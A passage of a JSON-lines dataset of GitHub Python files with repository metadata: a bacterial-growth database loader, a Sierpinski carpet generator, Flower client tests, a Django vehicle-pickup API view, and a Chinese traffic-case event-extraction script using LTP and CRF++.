perturbation_id=perturbation_id)\n \n elif 'PERTURBATION_ID' in info:\n perturbation_id = info['PERTURBATION_ID']\n 
print('\\nPERTURBATION ID: ', perturbation_id)\n \n \n if 'FILES' in info:\n files_dir = os.path.abspath(info['FILES']) + '/'\n\n biol_rep_analysis_file = PROJECT_DIRECTORY + BIOLOGICAL_REPLICATE_ANALYSIS_FILE\n biol_rep_args = [PROJECT_DIRECTORY, files_dir]\n biol_rep_files = getFiles(biol_rep_analysis_file, biol_rep_args, BIOLOGICAL_REPLICATES_LIST) #this will generate the new HEADERS_FILE\n\n headers_dict = clusterHeaders(PROJECT_DIRECTORY + HEADERS_FILE)\n \n addReplicates(headers_dict, biol_rep_files, biological_id=biological_id, perturbation_id=perturbation_id)\n\ndef setBiologicalReplicateId(study_id):\n '''\n This function sets up the biological replicate id depending on the study id\n \n :parama study_id in which the biological replicate is added\n :return biological_id\n '''\n number_biol_rep = db.countRecords('BiologicalReplicate', {'studyId': str(study_id)})\n biological_id = str(int(study_id)*100 + number_biol_rep + 1)\n return biological_id\n\ndef setPerturbationId(biological_id):\n '''\n This function sets up the perturbation id depending on the biological replicate id\n \n :parama biological_id in which the perturbation is added\n :return perturbation_id\n '''\n number_pert = db.countRecords('Perturbation', {'biologicalReplicateId': str(biological_id)})\n perturbation_id = biological_id + '.' + str(number_pert + 1)\n return perturbation_id\n\ndef addReplicates(headers, files, biological_id, perturbation_id):\n '''\n This function saves each file as a technical replicate\n For this, it calculates the replicate id with the biological_id providad (and the perturbation_id)\n Separates the file data into abundances/ph/metabolites\n Saves in txt file and in the db table\n\n :param headers: dict with categories as keys to separate df into sub_dfs\n :param files\n :param biological_id where replicates are added\n :param perturbation_id where replicates are added\n '''\n if perturbation_id == None:\n id = biological_id\n number_rep = db.countRecords('TechnicalReplicate', {'biologicalReplicateId': str(id)})\n else:\n id = perturbation_id\n number_rep = db.countRecords('TechnicalReplicate', {'perturbationId': str(id)})\n\n print('\\n- The ID in which the replicate files will be added is: ',id)\n print('- The number of replicates already in that id: ',number_rep)\n for i, f in enumerate(files):\n technical_id = str(id) + '_' + str(number_rep + i + 1)\n \n #Get directory of the provided paths\n path_end = max(findOccurrences(f, \"/\"))\n path = f[:path_end+1]\n\n #Read file with all the data\n df = pd.read_table(f, sep=\" \")\n \n growth_data = df[df.columns.intersection(headers['abundance'])]\n growth_data = growth_data.round({'OD': 3})\n \n ph_data = df[df.columns.intersection(headers['ph'])]\n ph_data = ph_data.round({'pH': 3})\n\n metabolites_data = df[df.columns.intersection(headers['metabolites'])]\n\n # If len(df.columns) <= 1 (only time column), we do not save it\n if len(growth_data.columns) > 1:\n g_path = path+'abundance_file.txt'\n growth_data.to_csv(g_path, sep=\" \", index=False)\n else: g_path = None\n \n if len(ph_data.columns) > 1: \n p_path = path+'pH_file.txt'\n ph_data.to_csv(p_path, sep=\" \", index=False)\n else: p_path = None\n\n if len(metabolites_data.columns) > 1:\n m_path = path+'metabolites_file.txt'\n metabolites_data.to_csv(m_path, sep=\" \", index=False)\n else: m_path = None\n\n rep = {\n 'technicalReplicateId': technical_id,\n 'biologicalReplicateId': biological_id,\n 'perturbationId': perturbation_id,\n 'abundanceFile': g_path,\n 'metabolitesFile': 
m_path,\n 'phFile': p_path\n }\n \n replicate_filtered = {k: v for k, v in rep.items() if v is not None}\n db.addRecord('TechnicalReplicate', replicate_filtered)", "repo_name": "jcasadogp/bacterial_growth", "sub_path": "src/import_into_database/populate_db.py", "file_name": "populate_db.py", "file_ext": "py", "file_size_in_byte": 14456, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "import_into_database.yml_functions.read_yml", "line_number": 20, "usage_type": "call"}, {"api_name": "db_functions.addRecord", "line_number": 29, "usage_type": "call"}, {"api_name": "db_functions.addRecord", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "utils.findOccurrences", "line_number": 67, "usage_type": "call"}, {"api_name": "import_into_database.bash_functions.getFiles", "line_number": 72, "usage_type": "call"}, {"api_name": "db_functions.addRecord", "line_number": 81, "usage_type": "call"}, {"api_name": "utils.transformStringIntoList", "line_number": 88, "usage_type": "call"}, {"api_name": "utils.transformStringIntoList", "line_number": 89, "usage_type": "call"}, {"api_name": "db_functions.addRecord", "line_number": 115, "usage_type": "call"}, {"api_name": "db_functions.addRecord", "line_number": 131, "usage_type": "call"}, {"api_name": "db_functions.addRecord", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path", "line_number": 142, "usage_type": "attribute"}, {"api_name": "import_into_database.bash_functions.getFiles", "line_number": 146, "usage_type": "call"}, {"api_name": "import_into_database.bash_functions.clusterHeaders", "line_number": 148, "usage_type": "call"}, {"api_name": "utils.transformStringIntoList", "line_number": 161, "usage_type": "call"}, {"api_name": "utils.transformStringIntoList", "line_number": 162, "usage_type": "call"}, {"api_name": "db_functions.addRecord", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path", "line_number": 185, "usage_type": "attribute"}, {"api_name": "import_into_database.bash_functions.getFiles", "line_number": 189, "usage_type": "call"}, {"api_name": "import_into_database.bash_functions.clusterHeaders", "line_number": 191, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 201, "usage_type": "call"}, {"api_name": "os.path", "line_number": 201, "usage_type": "attribute"}, {"api_name": "import_into_database.bash_functions.getFiles", "line_number": 205, "usage_type": "call"}, {"api_name": "import_into_database.bash_functions.clusterHeaders", "line_number": 207, "usage_type": "call"}, {"api_name": "db_functions.countRecords", "line_number": 218, "usage_type": "call"}, {"api_name": "db_functions.countRecords", "line_number": 229, "usage_type": "call"}, {"api_name": "db_functions.countRecords", "line_number": 247, "usage_type": "call"}, {"api_name": "db_functions.countRecords", "line_number": 250, "usage_type": "call"}, {"api_name": "utils.findOccurrences", "line_number": 258, "usage_type": "call"}, {"api_name": "pandas.read_table", "line_number": 262, "usage_type": "call"}, {"api_name": "db_functions.addRecord", "line_number": 298, "usage_type": "call"}]} +{"seq_id": "16895079212", "text": "import numpy\r\nimport cv2\r\n\r\ndef 
RemoveSquare(image, step=1, start=(0, 0), stop=None):\r\n    if stop is None:\r\n        stop = image.shape\r\n    size = (stop[0] - start[0]) // 3\r\n    center = (start[0] + size, start[1] + size)\r\n    image[center[0] : center[0] + size, center[1] : center[1] + size] = 0\r\n    if step == 1:\r\n        return image\r\n    for x in range(start[0], stop[0], size):\r\n        for y in range(start[1], stop[1], size):\r\n            if x != center[0] or y != center[1]:\r\n                image = RemoveSquare(image, step - 1, (x, y), (x + size, y + size))\r\n    return image\r\n\r\ndef CreateCarpet(steps, pixel_size=1):\r\n    size = pixel_size * (3 ** steps)\r\n    carpet = numpy.ones((size, size))\r\n    return RemoveSquare(carpet, steps)\r\n\r\nif __name__ == \"__main__\":\r\n    carpet = CreateCarpet(5, 1)\r\n    cv2.imshow(\"Carpet\", carpet)\r\n", "repo_name": "hilmiyafia/sierpinski-carpet", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 845, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.ones", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 25, "usage_type": "call"}]}
{"seq_id": "7285436192", "text": "from typing import Dict, Tuple\n\nfrom flwr.common import (\n    Config,\n    EvaluateIns,\n    EvaluateRes,\n    FitIns,\n    FitRes,\n    GetParametersIns,\n    GetParametersRes,\n    GetPropertiesIns,\n    GetPropertiesRes,\n    NDArrays,\n    Scalar,\n)\n\nfrom .app import start_client, start_numpy_client\nfrom .client import Client\nfrom .numpy_client import NumPyClient\n\n\nclass PlainClient(Client):\n    \"\"\"Client implementation extending the low-level Client.\"\"\"\n\n    def get_properties(self, ins: GetPropertiesIns) -> GetPropertiesRes:\n        \"\"\"Raise an Exception because this method is not expected to be called.\"\"\"\n        raise Exception()\n\n    def get_parameters(self, ins: GetParametersIns) -> GetParametersRes:\n        \"\"\"Raise an Exception because this method is not expected to be called.\"\"\"\n        raise Exception()\n\n    def fit(self, ins: FitIns) -> FitRes:\n        \"\"\"Raise an Exception because this method is not expected to be called.\"\"\"\n        raise Exception()\n\n    def evaluate(self, ins: EvaluateIns) -> EvaluateRes:\n        \"\"\"Raise an Exception because this method is not expected to be called.\"\"\"\n        raise Exception()\n\n\nclass NeedsWrappingClient(NumPyClient):\n    \"\"\"Client implementation extending the high-level NumPyClient.\"\"\"\n\n    def get_properties(self, config: Config) -> Dict[str, Scalar]:\n        \"\"\"Raise an Exception because this method is not expected to be called.\"\"\"\n        raise Exception()\n\n    def get_parameters(self, config: Config) -> NDArrays:\n        \"\"\"Raise an Exception because this method is not expected to be called.\"\"\"\n        raise Exception()\n\n    def fit(\n        self, parameters: NDArrays, config: Config\n    ) -> Tuple[NDArrays, int, Dict[str, Scalar]]:\n        \"\"\"Raise an Exception because this method is not expected to be called.\"\"\"\n        raise Exception()\n\n    def evaluate(\n        self, parameters: NDArrays, config: Config\n    ) -> Tuple[float, int, Dict[str, Scalar]]:\n        \"\"\"Raise an Exception because this method is not expected to be called.\"\"\"\n        raise Exception()\n\n\ndef test_to_client_with_client() -> None:\n    \"\"\"Test to_client.\"\"\"\n    client = PlainClient().to_client()\n\n    # Assert\n    assert isinstance(client, Client)\n\n\ndef test_to_client_with_numpyclient() -> None:\n    \"\"\"Test to_client.\"\"\"\n    client = NeedsWrappingClient().to_client()\n\n    # Assert\n    assert isinstance(client, Client)\n\n\ndef 
test_start_client_transport_invalid() -> None:\n    \"\"\"Test start_client(..., transport=...).\"\"\"\n    # Prepare\n    client: Client = PlainClient()\n    invalid_transport = \"invalid-transport-value\"\n\n    # Execute\n    try:\n        start_client(\n            server_address=\"0.0.0.0:8080\", client=client, transport=invalid_transport\n        )\n        raise AssertionError()  # Fail the test if no exception was raised\n    except ValueError:\n        pass\n\n\ndef test_start_numpy_client_transport_invalid() -> None:\n    \"\"\"Test start_numpy_client(..., transport=...).\"\"\"\n    # Prepare\n    client: NumPyClient = NeedsWrappingClient()\n    invalid_transport = \"invalid-transport-value\"\n\n    # Execute\n    try:\n        start_numpy_client(\n            server_address=\"0.0.0.0:8080\", client=client, transport=invalid_transport\n        )\n        raise AssertionError()  # Fail the test if no exception was raised\n    except ValueError:\n        pass\n", "repo_name": "adap/flower", "sub_path": "src/py/flwr/client/app_test.py", "file_name": "app_test.py", "file_ext": "py", "file_size_in_byte": 3315, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3287, "dataset": "github-code", "pt": "61", "api": [{"api_name": "client.Client", "line_number": 22, "usage_type": "name"}, {"api_name": "flwr.common.GetPropertiesIns", "line_number": 25, "usage_type": "name"}, {"api_name": "flwr.common.GetPropertiesRes", "line_number": 25, "usage_type": "name"}, {"api_name": "flwr.common.GetParametersIns", "line_number": 29, "usage_type": "name"}, {"api_name": "flwr.common.GetParametersRes", "line_number": 29, "usage_type": "name"}, {"api_name": "flwr.common.FitIns", "line_number": 33, "usage_type": "name"}, {"api_name": "flwr.common.FitRes", "line_number": 33, "usage_type": "name"}, {"api_name": "flwr.common.EvaluateIns", "line_number": 37, "usage_type": "name"}, {"api_name": "flwr.common.EvaluateRes", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy_client.NumPyClient", "line_number": 42, "usage_type": "name"}, {"api_name": "flwr.common.Config", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 45, "usage_type": "name"}, {"api_name": "flwr.common.Scalar", "line_number": 45, "usage_type": "name"}, {"api_name": "flwr.common.Config", "line_number": 49, "usage_type": "name"}, {"api_name": "flwr.common.NDArrays", "line_number": 49, "usage_type": "name"}, {"api_name": "flwr.common.NDArrays", "line_number": 54, "usage_type": "name"}, {"api_name": "flwr.common.Config", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 55, "usage_type": "name"}, {"api_name": "flwr.common.NDArrays", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 55, "usage_type": "name"}, {"api_name": "flwr.common.Scalar", "line_number": 55, "usage_type": "name"}, {"api_name": "flwr.common.NDArrays", "line_number": 60, "usage_type": "name"}, {"api_name": "flwr.common.Config", "line_number": 60, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 61, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 61, "usage_type": "name"}, {"api_name": "flwr.common.Scalar", "line_number": 61, "usage_type": "name"}, {"api_name": "client.Client", "line_number": 71, "usage_type": "argument"}, {"api_name": "client.Client", "line_number": 79, "usage_type": "argument"}, {"api_name": "client.Client", "line_number": 85, "usage_type": "name"}, {"api_name": "app.start_client", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy_client.NumPyClient", "line_number": 101, "usage_type": "name"}, {"api_name": 
"app.start_numpy_client", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "17137585399", "text": "from rest_framework.permissions import AllowAny, IsAuthenticated\nfrom rest_framework.views import APIView\nfrom rest_framework.generics import ListAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.serializers import Serializer\nfrom .serializers import PickUpSerializer\n\nfrom django.conf import settings\nfrom twilio.rest import Client\n\nfrom CustomerData.models import SalesData, CSR,CustomerTrack\nfrom CustomerData.serializers import CSRSerializer, SalesDataSerializer,CustomerTrackSerializer\nfrom .serializers import PickUpSerializer\n\n\nclass PickupView(APIView):\n def get(self, request, customerToken=None, format=None):\n if customerToken == None:\n customer = [(customer.rcNo,customer.customer_token) for customer in CustomerTrack.objects.all()]\n testdata = []\n for i in customer:\n Salesdata = [ testdata.append( CustomerTrackSerializer(SalesData)) for SalesData in CustomerTrack.objects.all().filter(\n rcNo__iexact=i[0],customer_token=i[1], status__iexact='ASSIGNED')]\n \n return Response({'Assigned': testdata})\n else:\n try:\n customer = CustomerTrack.objects.get(customer_token=customerToken)\n Salesdata = [CustomerTrackSerializer(SalesData) for SalesData in CustomerTrack.objects.all().filter(\n customer_token__iexact=customer.customer_token,status__iexact='ASSIGNED')]\n return Response({'Assigned': Salesdata})\n except:\n return Response({'Message': 'Requst NotFound'})\n\n def post(self, request, customerToken=None, format=None):\n data = request.data\n SalesData1= CustomerTrack.objects.get(\n customer_token=customerToken)\n if SalesData1.status=='ASSIGNED':\n serializer = PickUpSerializer(data=data)\n if serializer.is_valid():\n serializer.save(user=request.user)\n SalesData1.status='PICKED'\n SalesData1.save()\n CustomerData = [CustomerTrackSerializer(SalesData) for SalesData in CustomerTrack.objects.all().filter(\n customer_token=customerToken,status__iexact='PICKED')]\n\n # client = Client(settings.TWILIO_ACCOUNT_SID,\n # settings.TWILIO_AUTH_TOKEN)\n\n # message = 'Hi '+SalesData1.name + \\\n # ' your vehicle ' + SalesData1.rcNo + ' has been picked by the driver ' + \\\n # request.user.first_name + ' ' + request.user.last_name + ' +919008088227'\n # client.messages.create(\n # to=settings.CUSTOMER_NUMBER,\n # from_=settings.TWILIO_NUMBER,\n # body=message + u'\\U0001f680')\n return Response({'PickupDetails': serializer.data,\n 'CustomerData':CustomerData})\n else:\n return Response({'Message': 'Please upload the valid information'})\n\n elif SalesData1.status=='PICKED':\n return Response({'Message': 'Request is status is Picked'})\n\n elif SalesData1.status=='COMPLETED':\n return Response({'Message': 'Request is status is Completed'})\n \n\n", "repo_name": "siliconbrainz/Incident-Management-System-2", "sub_path": "Pickup/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3294, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.views.APIView", "line_number": 16, "usage_type": "name"}, {"api_name": "CustomerData.models.CustomerTrack.objects.all", "line_number": 19, "usage_type": "call"}, {"api_name": "CustomerData.models.CustomerTrack.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "CustomerData.models.CustomerTrack", "line_number": 19, "usage_type": "name"}, {"api_name": 
"CustomerData.serializers.CustomerTrackSerializer", "line_number": 22, "usage_type": "call"}, {"api_name": "CustomerData.models.SalesData", "line_number": 22, "usage_type": "argument"}, {"api_name": "CustomerData.models.CustomerTrack.objects.all", "line_number": 22, "usage_type": "call"}, {"api_name": "CustomerData.models.CustomerTrack.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "CustomerData.models.CustomerTrack", "line_number": 22, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 25, "usage_type": "call"}, {"api_name": "CustomerData.models.CustomerTrack.objects.get", "line_number": 28, "usage_type": "call"}, {"api_name": "CustomerData.models.CustomerTrack.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "CustomerData.models.CustomerTrack", "line_number": 28, "usage_type": "name"}, {"api_name": "CustomerData.serializers.CustomerTrackSerializer", "line_number": 29, "usage_type": "call"}, {"api_name": "CustomerData.models.SalesData", "line_number": 29, "usage_type": "argument"}, {"api_name": "CustomerData.models.CustomerTrack.objects.all", "line_number": 29, "usage_type": "call"}, {"api_name": "CustomerData.models.CustomerTrack.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "CustomerData.models.CustomerTrack", "line_number": 29, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 31, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 33, "usage_type": "call"}, {"api_name": "CustomerData.models.CustomerTrack.objects.get", "line_number": 37, "usage_type": "call"}, {"api_name": "CustomerData.models.CustomerTrack.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "CustomerData.models.CustomerTrack", "line_number": 37, "usage_type": "name"}, {"api_name": "serializers.PickUpSerializer", "line_number": 40, "usage_type": "call"}, {"api_name": "CustomerData.models", "line_number": 45, "usage_type": "name"}, {"api_name": "CustomerData.serializers.CustomerTrackSerializer", "line_number": 45, "usage_type": "call"}, {"api_name": "CustomerData.models.SalesData", "line_number": 45, "usage_type": "argument"}, {"api_name": "CustomerData.models.CustomerTrack.objects.all", "line_number": 45, "usage_type": "call"}, {"api_name": "CustomerData.models.CustomerTrack.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "CustomerData.models.CustomerTrack", "line_number": 45, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 58, "usage_type": "call"}, {"api_name": "CustomerData.models", "line_number": 59, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 61, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 64, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "40379002419", "text": "# -*- coding: utf-8 -*-\nimport re\nimport os\nimport csv\nfrom pyltp import NamedEntityRecognizer\nfrom pyltp import Postagger\nfrom pyltp import Segmentor\nimport glob\nfrom utils import extract_seg\nfrom utils import sentence_result\nfrom utils import remove_duplicate_elements\nfrom utils import find_element\n\npunctuation = ''',。、:;()XX×xa\"“”,<《》'''\n\nf = open(\"case.txt\", \"r\", encoding=\"utf-8\")\ncase = f.read().strip()\nf.close()\n\n# 预处理\nline1 = re.sub(u\"(.*?)\", \"\", case) # 去除括号内注释\nline2 = re.sub(\"[%s]+\" % punctuation, 
\"\", line1) # 去除标点、特殊字母\nf2 = open(\"preprocessed_data.txt\", \"w\", encoding='utf-8')\nf2.write(line2)\nf2.close()\n\n# 分词、词性标注、命名实体识别\nLTP_DATA_DIR = '/home/zhangshiwei/ltp_data_v3.4.0/' # ltp模型目录的路径,根据实际情况修改\ncws_model_path = os.path.join(LTP_DATA_DIR,\n 'cws.model') # 分词模型路径,模型名称为`cws.model`\npos_model_path = os.path.join(LTP_DATA_DIR,\n 'pos.model') # 词性标注模型路径,模型名称为`pos.model`\nner_model_path = os.path.join(LTP_DATA_DIR,\n 'ner.model') # 命名实体识别模型路径,模型名称为`ner.model`\n# 分词\nsegmentor = Segmentor() # 初始化分词实例\nsegmentor.load_with_lexicon(cws_model_path,\n '/home/zhangshiwei/Event-Extraction/02分词/分词算法/05LTP分词/dict') # 加载分词模型,以及自定义词典\nseg_list = segmentor.segment(line2) # 分词\n# 词性标注\npostagger = Postagger() # 初始化词性标注实例\npostagger.load(pos_model_path) # 加载模型\npostags = postagger.postag(seg_list) # 词性标注\n# 命名实体识别\nrecognizer = NamedEntityRecognizer() # 初始化命名实体识别实例\nrecognizer.load(ner_model_path) # 加载模型\nnetags = recognizer.recognize(seg_list, postags) # 命名实体识别\n# 写入结果\nf1 = open(\"分词_词性标注_命名实体识别_结果.txt\", \"w\", encoding='utf-8')\nfor word, postag, netag in zip(seg_list, postags, netags):\n if word == '\\n':\n f1.write('\\n')\n else:\n f1.write(word + \" \" + postag + \" \" + netag + \"\\n\")\nf1.close()\n\n# CRF识别事件要素\nif os.path.exists(\"CRF结果.txt\"):\n os.remove(\"CRF结果.txt\")\nos.system(\n \"cd /home/zhangshiwei/CRF++-0.58 && crf_test -m model /home/zhangshiwei/Event-Extraction/07案件相似度/分词_词性标注_命名实体识别_结果.txt >> /home/zhangshiwei/Event-Extraction/07案件相似度/CRF结果.txt\")\n\n\ndef get_event_elements(case_file):\n \"\"\"\n 将案件中属于同一事件要素的词语合并,最终返回完整的事件要素\n :param case_file: 记录单个案件的文本文件\n :return event_elements: 返回一个字典,键为事件要素类型,值为对应的事件要素组成的list\n \"\"\"\n words = [] # 保存所有属于事件要素的单词\n element_types = [] # 保存上述单词对应的事件要素类型\n\n with open(case_file, \"r\", encoding='utf-8') as f1:\n rows = []\n # 将文本转换成list,方便后续处理\n for line in f1.readlines():\n rows.append(line.strip(\"\\n\").split(\"\\t\"))\n\n for index, row in enumerate(rows):\n if \"S\" in row[-1]:\n # S出现在最后一个位置,说明这是一个单独的事件要素,将其加入words列表\n words.append(row[0])\n element_types.append(row[-1][-1])\n\n elif \"B\" in row[-1]:\n # 处理由多个单词组成的事件要素\n words.append(row[0])\n element_types.append(row[-1][-1])\n j = index + 1\n while \"I\" in rows[j][-1] or \"E\" in rows[j][-1]:\n words[-1] += rows[j][0]\n j += 1\n if j == len(rows):\n break\n\n # 将事件要素进行分类(将words列表中的元素按照类别分成6类)\n T = [] # 事故类型\n K = [] # 罪名\n D = [] # 主次责任\n P = [] # 积极因素(减刑因素)\n N = [] # 消极因素(加刑因素)\n R = [] # 判决结果\n\n for i in range(len(element_types)):\n if element_types[i] == \"T\":\n T.append(words[i])\n elif element_types[i] == \"K\":\n K.append(words[i])\n elif element_types[i] == \"D\":\n D.append(words[i])\n elif element_types[i] == \"P\":\n P.append(words[i])\n elif element_types[i] == \"N\":\n N.append(words[i])\n elif element_types[i] == \"R\":\n R.append(words[i])\n\n # 为了防止CRF未能抽取出全部的事件要素,因此使用规则化的方法,从原始文本中直接提取出部分事件要素,作为补充\n case = \"\" # case是完整的案件内容\n for idx in range(len(rows)):\n case += rows[idx][0]\n\n if \"无证\" in case or \"驾驶资格\" in case:\n N.append(\"无证驾驶\")\n if \"无号牌\" in case or \"牌照\" in case or \"无牌\" in case:\n N.append(\"无牌驾驶\")\n if \"酒\" in case:\n N.append(\"酒后驾驶\")\n if \"吸毒\" in case or \"毒品\" in case or \"毒驾\" in case:\n N.append(\"吸毒后驾驶\")\n if \"超载\" in case:\n N.append(\"超载\")\n if \"逃逸\" in case or \"逃离\" in case:\n N.append(\"逃逸\")\n if (\"有前科\" in case or \"有犯罪前科\" in case) and (\n \"无前科\" not in case and \"无犯罪前科\" not in case):\n N.append(\"有犯罪前科\")\n\n # 整理抽取结果\n event_elements = dict() # 用字典存储各类事件要素\n event_elements[\"事故类型\"] = 
remove_duplicate_elements(T)\n event_elements[\"罪名\"] = remove_duplicate_elements(K)\n event_elements[\"主次责任\"] = remove_duplicate_elements(D)\n event_elements[\"减刑因素\"] = remove_duplicate_elements(P)\n event_elements[\"加刑因素\"] = remove_duplicate_elements(N)\n event_elements[\"判决结果\"] = remove_duplicate_elements(R)\n\n # 打印出完整的事件要素\n for key, value in event_elements.items():\n print(key, value)\n\n return event_elements\n\n\ndef get_patterns_from_dict(event_elements):\n \"\"\"\n 将提取出的事件要素转换成特征\n :param event_elements: 字典形式的事件要素\n :return patterns: 字典形式的特征\n \"\"\"\n patterns = dict()\n\n # 从事件要素中的\"加刑因素\"提取出三个特征:01死亡人数、02重伤人数、03轻伤人数\n patterns[\"01死亡人数\"], patterns[\"02重伤人数\"], patterns[\"03轻伤人数\"] = extract_seg(\n \"\".join(event_elements[\"加刑因素\"]))\n\n # 从事件要素中的\"主次责任\"提取出特征:04责任认定\n patterns[\"04责任认定\"] = find_element(event_elements[\"主次责任\"], \"全部责任\")\n\n # 从事件要素中的\"加刑因素\"提取出8个特征\n patterns[\"05是否酒后驾驶\"] = find_element(event_elements[\"加刑因素\"], \"酒\")\n patterns[\"06是否吸毒后驾驶\"] = find_element(event_elements[\"加刑因素\"], \"毒\")\n patterns[\"07是否无证驾驶\"] = find_element(event_elements[\"加刑因素\"], \"驾驶证\", \"证\")\n patterns[\"08是否无牌驾驶\"] = find_element(event_elements[\"加刑因素\"], \"牌照\", \"牌\")\n patterns[\"09是否不安全驾驶\"] = find_element(event_elements[\"加刑因素\"], \"安全\")\n patterns[\"10是否超载\"] = find_element(event_elements[\"加刑因素\"], \"超载\")\n patterns[\"11是否逃逸\"] = find_element(event_elements[\"加刑因素\"], \"逃逸\", \"逃离\")\n patterns[\"是否初犯偶犯\"] = 1 - int(find_element(event_elements[\"加刑因素\"], \"前科\"))\n\n # 从事件要素中的\"减刑因素\"提取出7个特征\n patterns[\"12是否抢救伤者\"] = find_element(event_elements[\"减刑因素\"], \"抢救\", \"施救\")\n patterns[\"13是否报警\"] = find_element(event_elements[\"减刑因素\"], \"报警\", \"自首\", \"投案\")\n patterns[\"14是否现场等待\"] = find_element(event_elements[\"减刑因素\"], \"现场\", \"等候\")\n patterns[\"15是否赔偿\"] = find_element(event_elements[\"减刑因素\"], \"赔偿\")\n patterns[\"16是否认罪\"] = find_element(event_elements[\"减刑因素\"], \"认罪\")\n patterns[\"17是否如实供述\"] = find_element(event_elements[\"减刑因素\"], \"如实\")\n if patterns[\"是否初犯偶犯\"] == 0:\n patterns[\"18是否初犯偶犯\"] = \"0\"\n else:\n patterns[\"18是否初犯偶犯\"] = \"1\"\n return patterns\n\n\ndef label_case(file, is_label=False):\n \"\"\"\n 给数据打标签\n :param is_label: 是否需要将刑期分类,默认不分类\n :param file: 无标签的preprocessed_data.txt\n :return:\n \"\"\"\n f = open(file, 'r', encoding='utf-8')\n cases = f.readlines()\n labels = []\n for case in cases:\n labels.append(sentence_result(case))\n f.close()\n\n # 分类\n if is_label:\n for i in range(len(labels)):\n if 0 <= labels[i] <= 5:\n labels[i] = 0\n elif 6 <= labels[i] <= 18:\n labels[i] = 1\n elif 19 <= labels[i] <= 24:\n labels[i] = 2\n elif 25 <= labels[i] <= 36:\n labels[i] = 3\n else:\n labels[i] = 4\n\n return labels\n\n\nheaders = [\n '01死亡人数',\n \"02重伤人数\",\n \"04责任认定\",\n \"05是否酒后驾驶\",\n \"06是否吸毒后驾驶\",\n \"07是否无证驾驶\",\n \"08是否无牌驾驶\",\n \"09是否不安全驾驶\",\n \"10是否超载\",\n \"11是否逃逸\",\n \"12是否抢救伤者\",\n \"13是否报警\",\n \"14是否现场等待\",\n \"15是否赔偿\",\n \"16是否认罪\",\n \"18是否初犯偶犯\",\n \"判决结果\"]\nrows = []\n\n# 提取标签\nlabels = label_case(\"preprocessed_data.txt\", is_label=True)\nnum_cases = 1\n\nf1 = open(\"preprocessed_data.txt\", \"r\", encoding=\"utf-8\")\ncases = f1.readlines()\n\nevent_elements = get_event_elements(\"CRF结果.txt\")\npatterns = get_patterns_from_dict(event_elements)\n\n# 因为目前CRF提取的效果还不够好,伤亡情况可能没有提取出来\n# 保险起见,对整个案件进行提取死亡人数等3个特征,而非事件抽取的结果\npatterns['01死亡人数'], patterns['02重伤人数'], patterns['03轻伤人数'] = extract_seg(line2)\npatterns[\"判决结果\"] = labels[0]\ndel patterns[\"是否初犯偶犯\"]\ndel patterns[\"03轻伤人数\"]\ndel 
patterns[\"17是否如实供述\"]\nrows.append(patterns)\nf1.close()\n\n# 写回数据\nwith open(\"pattern.csv\", \"w\", newline='') as f:\n f_csv = csv.DictWriter(f, headers)\n # f_csv.writeheader()\n f_csv.writerows(rows)\n\nf3 = open(\"pattern.csv\", \"r\")\nf3_csv = list(csv.reader(f3))\n\nf4 = open(\"/home/zhangshiwei/Event-Extraction/06判决结果预测/特征提取/data.csv\", \"r\")\nf4_csv = list(csv.reader(f4))\n\nmark = []\nfor i in range(len(f4_csv)):\n if f3_csv[0] == f4_csv[i]:\n mark.append(i)\nf3.close()\nf4.close()\n\nwith open(\"类似案件.txt\", \"w\", encoding=\"utf-8\") as f5:\n f6 = open(\"/home/zhangshiwei/Event-Extraction/01数据预处理/preprocessed_data.txt\", \"r\", encoding=\"utf-8\")\n contents = f6.readlines()\n for i in range(len(mark)):\n f5.write(contents[i])\n f6.close()\n", "repo_name": "zhang17173/Event-Extraction", "sub_path": "07案件相似度/案件特征提取.py", "file_name": "案件特征提取.py", "file_ext": "py", "file_size_in_byte": 11429, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 524, "dataset": "github-code", "pt": "61", "api": [{"api_name": "re.sub", "line_number": 21, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": 